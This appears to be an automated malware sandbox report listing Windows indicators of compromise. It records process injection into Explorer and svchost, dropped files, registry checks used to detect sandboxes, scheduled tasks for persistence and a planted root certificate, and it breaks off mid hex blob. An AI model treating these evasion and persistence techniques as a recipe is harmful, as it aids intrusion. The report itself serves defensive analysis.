Sun03f0dc4460bc9.exesvchost.exeUzYxXqOkTtDpwSezwVXY7Exr.exeEN8kVF9nOEITndkmKROPnWJy.exeuecNmHuKV5CntDpX5R5cAnad.exeNvh_1uHJ5edoJRrt0aUqMKjC.exeUjJmg_DELP1NaVeOyjr4XbfL.exejw1BtrPSHkN5Ycj5GrGZrWNp.exezYHzp_ecSfHCBQQQXejKOBf6.exewlanext.execonhost.exedescription pid process target process PID 4204 set thread context of 4972 4204 Sun03f0dc4460bc9.exe Sun03f0dc4460bc9.exe PID 5060 set thread context of 3376 5060 svchost.exe svchost.exe PID 2252 set thread context of 2604 2252 UzYxXqOkTtDpwSezwVXY7Exr.exe Explorer.EXE PID 1788 set thread context of 5740 1788 EN8kVF9nOEITndkmKROPnWJy.exe AppLaunch.exe PID 1364 set thread context of 5428 1364 uecNmHuKV5CntDpX5R5cAnad.exe AppLaunch.exe PID 2524 set thread context of 5344 2524 Nvh_1uHJ5edoJRrt0aUqMKjC.exe Nvh_1uHJ5edoJRrt0aUqMKjC.exe PID 760 set thread context of 3344 760 UjJmg_DELP1NaVeOyjr4XbfL.exe UjJmg_DELP1NaVeOyjr4XbfL.exe PID 5264 set thread context of 4392 5264 jw1BtrPSHkN5Ycj5GrGZrWNp.exe jw1BtrPSHkN5Ycj5GrGZrWNp.exe PID 2440 set thread context of 6812 2440 zYHzp_ecSfHCBQQQXejKOBf6.exe zYHzp_ecSfHCBQQQXejKOBf6.exe PID 5664 set thread context of 2604 5664 wlanext.exe Explorer.EXE PID 5940 set thread context of 1988 5940 conhost.exe explorer.exe PID 5664 set thread context of 1988 5664 wlanext.exe explorer.exe -
Drops file in Program Files directory 22 IoCs
Processes:
1ElQX1vnC6hzc6ozl4KylRRW.exejg1_1faf.exed3AMh7RrYP1XgER3nYdWgVrD.exewlanext.exeExplorer.EXEAdobeARM.exeSun03f5d51697d04.tmpd3AMh7RrYP1XgER3nYdWgVrD.exedescription ioc process File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe 1ElQX1vnC6hzc6ozl4KylRRW.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe 1ElQX1vnC6hzc6ozl4KylRRW.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini 1ElQX1vnC6hzc6ozl4KylRRW.exe File created C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d jg1_1faf.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe d3AMh7RrYP1XgER3nYdWgVrD.exe File opened for modification C:\Program Files (x86)\Hsnulor\updateppq.exe wlanext.exe File opened for modification C:\Program Files (x86)\Hsnulor Explorer.EXE File created C:\Program Files (x86)\Hsnulor\updateppq.exe Explorer.EXE File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Backup AdobeARM.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW jg1_1faf.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe d3AMh7RrYP1XgER3nYdWgVrD.exe File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun03f5d51697d04.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe d3AMh7RrYP1XgER3nYdWgVrD.exe File created C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File created C:\Program Files (x86)\FarLabUninstaller\is-2ATCP.tmp Sun03f5d51697d04.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe 1ElQX1vnC6hzc6ozl4KylRRW.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe d3AMh7RrYP1XgER3nYdWgVrD.exe File created C:\Program Files (x86)\Company\NewProduct\tmp.edb jg1_1faf.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\d.jfm jg1_1faf.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\Temp AdobeARM.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3548 420 WerFault.exe setup_install.exe 1492 1984 WerFault.exe Sun033e271e0ce96c08.exe 3820 1984 WerFault.exe Sun033e271e0ce96c08.exe 1388 1984 WerFault.exe Sun033e271e0ce96c08.exe 3012 1984 WerFault.exe Sun033e271e0ce96c08.exe 5328 1984 WerFault.exe Sun033e271e0ce96c08.exe 5472 2332 WerFault.exe setup.exe 5504 68 WerFault.exe 6.exe 5936 2332 WerFault.exe setup.exe 5244 1984 WerFault.exe Sun033e271e0ce96c08.exe 5292 2332 WerFault.exe setup.exe 5484 2332 WerFault.exe setup.exe 5840 1984 WerFault.exe Sun033e271e0ce96c08.exe 612 2332 WerFault.exe setup.exe -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
extd.exefrbwjdafrbwjdaSun0324aba28588c0.exefrbwjdafrbwjdafrbwjdadescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI extd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI extd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI extd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun0324aba28588c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI frbwjda -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exexcLVIwmxi_ZLJsepaVLcueHv.exexcLVIwmxi_ZLJsepaVLcueHv.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xcLVIwmxi_ZLJsepaVLcueHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString xcLVIwmxi_ZLJsepaVLcueHv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xcLVIwmxi_ZLJsepaVLcueHv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString xcLVIwmxi_ZLJsepaVLcueHv.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4980 schtasks.exe 5768 schtasks.exe 7004 schtasks.exe 352 schtasks.exe 6280 schtasks.exe 1552 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 6700 timeout.exe 6380 timeout.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2312 taskkill.exe 5220 taskkill.exe 5352 taskkill.exe 1692 taskkill.exe 3048 taskkill.exe 7032 taskkill.exe 6744 taskkill.exe 5548 taskkill.exe -
Processes:
mshta.exewlanext.exeOneDriveSetup.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Key created \Registry\User\S-1-5-21-941723256-3451054534-3089625102-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 wlanext.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Enable = "1" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Size = "10" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION OneDriveSetup.exe -
Modifies data under HKEY_USERS 16 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 svchost.exe -
Modifies registry class 64 IoCs
Processes:
OneDriveSetup.exeFileSyncConfig.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{021E4F06-9DCC-49AD-88CF-ECC2DA314C8A}\LocalServer32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{47E6DCAF-41F8-441C-BD0E-A50D5FE6C4D1} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\PROGID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\VersionIndependentProgID OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32\ = "%systemroot%\\SysWow64\\shell32.dll" FileSyncConfig.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib\Version = "1.0" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\FileSyncClient.FileSyncClient\CLSID\ = "{7B37E4E2-C62F-4914-9620-8FB5062718CC}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\VERSIONINDEPENDENTPROGID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ = "IGetSelectiveSyncInformationCallback" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\SYNCENGINEFILEINFOPROVIDER.SYNCENGINEFILEINFOPROVIDER.1\CLSID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\TypeLib\{4B1C80DA-FA45-468F-B42B-46496BDBE0C5}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\\3" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.196.0921.0007\\FileCoAuth.exe\"" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{A3CA1CF4-5F3E-4AC0-91B9-0D3716E1EAC3}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /cci /client=Personal" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\TypeLib OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\INPROCSERVER32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\NucleusToastActivator.NucleusToastActivator\CurVer\ = "NucleusToastActivator.NucleusToastActivator.1" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InProcServer32 FileSyncConfig.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\*\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ProgID\ = "FileSyncOutOfProcServices.FileSyncOutOfProcServices.1" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\TypeLib\{F904F88C-E60D-4327-9FA2-865AD075B400} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{DA82E55E-FA2F-45B3-AEC3-E7294106EF52}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\ = "FileSyncOutOfProcServices Class" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ = "ILaunchUXInterface" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\odopen OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\grvopen\ = "URL: OneDrive Client Protocol" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder FileSyncConfig.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\VERSIONINDEPENDENTPROGID OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ = "IFileSyncOutOfProcServices" OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\DEFAULTICON FileSyncConfig.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TYPELIB OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\CLSID\{94269C4E-071A-4116-90E6-52E557067E4E}\TYPELIB OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334} OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib\Version = "1.0" OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib OneDriveSetup.exe -
Processes:
Calculator.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6